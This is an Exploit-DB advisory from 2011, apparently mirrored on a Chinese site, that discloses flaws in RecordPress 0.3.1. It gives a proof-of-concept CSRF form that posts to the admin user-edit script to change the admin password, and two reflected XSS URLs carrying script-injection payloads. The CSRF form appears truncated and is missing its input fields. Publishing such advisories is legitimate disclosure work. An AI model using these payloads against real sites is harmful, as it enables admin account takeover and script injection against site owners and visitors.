recordpress 0.3.1 – Multiple Vulnerabilities - 体验盒子

作者： Khashayar Fereidani

日期： 2011-03-09

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/16950/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

----------------------------------------------------------------

WebApplication : RecordPress 0.3.1

Type of vunlnerability : CSRF ( Change Admin Password ) And XSS

Risk of use : Medium

----------------------------------------------------------------

Producer Website : http://www.recordpress.org/

----------------------------------------------------------------

Discovered by : Khashayar Fereidani

Team Website : http://IRCRASH.COM

Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim

English Forums : Http://IRCRASH.COM/forums/

Email : irancrash [ a t ] gmail [ d o t ] com

Facebook : http://facebook.com/fereidani

----------------------------------------------------------------

CSRF For Change Admin Password :

<html>

<form action="http://examplesite/admin/rp-settings-users-edit-db.php?id=1";

method="POST" name="form">

</form>

</body>

</html>

------------------------------------------------

Cross Site Scripting Vulnerabilities :

http://examplesite/header.php?row[titledesc]=<script>alert(123)</script>

http://examplesite/admin/rp-menu.php?_SESSION[sess_user]=<script>alert(123)</script>